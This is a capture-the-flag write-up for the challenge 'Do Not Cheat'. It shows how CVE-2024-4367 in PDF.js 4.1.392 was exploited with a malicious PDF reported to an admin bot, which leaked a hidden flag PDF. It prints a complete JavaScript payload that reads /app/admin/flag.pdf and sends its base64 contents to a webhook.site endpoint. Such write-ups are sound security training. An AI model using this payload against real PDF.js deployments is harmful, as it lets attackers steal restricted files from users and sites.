1753c web/Do Not Cheat
My solution for 1753c web/Do Not Cheat challenge
Challenge overview
This challenge involved exploiting the CVE-2024-4367 vulnerability in PDF.js to gain access to a hidden flag in a protected admin area.
Analysis
Reconnaissance
Upon visiting the challenge site, I was presented with a webpage containing various “cheatsheets” available for download: 
Examining the website revealed a collection of PDF documents that were publicly accessible. Each PDF was being rendered in the browser using PDF.js, as evident from the UI elements in the viewer.
Discovery Phase
Looking at the source code of the page, I found something interesting:
The page contained a JavaScript array of files, including a hidden Flag file at the path /app/admin/flag.pdf that wasn’t linked from the main interface. When attempting to access this file directly, access was denied:
Further investigation revealed that the site was using PDF.js version 4.1.392:
Research showed this version was vulnerable to CVE-2024-4367, a security flaw that allows arbitrary JavaScript execution through malicious PDF files: 
LINK TO CVE
Exploitation
The vulnerability allows JavaScript execution in the PDF.js context when a malicious PDF is loaded. Since the challenge is called “Do Not Cheat,” I suspected I needed to use this vulnerability to access the flag PDF in the admin area.
My approach:
- Set up a server
- Create a malicious PDF that would fetch the admin flag file and send it to my webhook
- Host and access this PDF to trigger the exploit
Setting Up the Server
I set up a simple Python server with CORS headers enabled: 
Then I used webhook to capture any data that would be exfiltrated from the challenge site.
Creating the Exploit
The key challenge was crafting an XHR request that would:
- Fetch the admin flag PDF
- Send the contents to my webhook
After several attempts, I created a payload that successfully exfiltrated the flag PDF:
1
2
3
4
5
6
var xhr=new XMLHttpRequest();xhr.open('GET','/app/admin/flag.pdf',tru
e);xhr.responseType='arraybuffer';xhr.onload=function(){if(this.status===200){var blob=new Blob([this.response],{type:'a
pplication/pdf'});var reader=new FileReader();reader.onload=function(e){var exfilXhr=new XMLHttpRequest();exfilXhr.open(
'POST','https://webhook.site/[WEBHOOK_ID]',true);exfilXhr.setRequestHeader('Content-Type','appli
cation/x-www-form-urlencoded');exfilXhr.send('flag='+encodeURIComponent(e.target.result.split(',')[1]));};reader.readAsD
ataURL(blob);}};xhr.send();
I used a tool for generating malicious PDFs with the CVE-2024-4367 vulnerability, injecting my payload. LINK TO POC AUTHOR
First I tried to load it and it worked: 
Extracting the Flag
After hosting the malicious PDF, report it to admin through the challenge site, the PDF.js vulnerability was triggered, and my payload executed. The base64-encoded content of the flag PDF was successfully sent to my webhook: 
I decoded the base64 content and saved it as a PDF file, revealing the flag: 
Final flag: 1753c{m0zz4r3ll4_pdfjs_h4d_4_bug}
Key takeaways
- Keep libraries updated
- The challenge demonstrated how an outdated version of PDF.js (4.1.392) with a known vulnerability (CVE-2024-4367) can be exploited. Always maintain current versions of libraries and frameworks to prevent exploitation of known security flaws.
- Client-side security cannot be trusted
- This exploit demonstrated that any client-side security mechanisms can be bypassed. The PDF viewer was intended to display public documents, but when the underlying JavaScript engine was compromised, it could be leveraged to access restricted content within the same origin.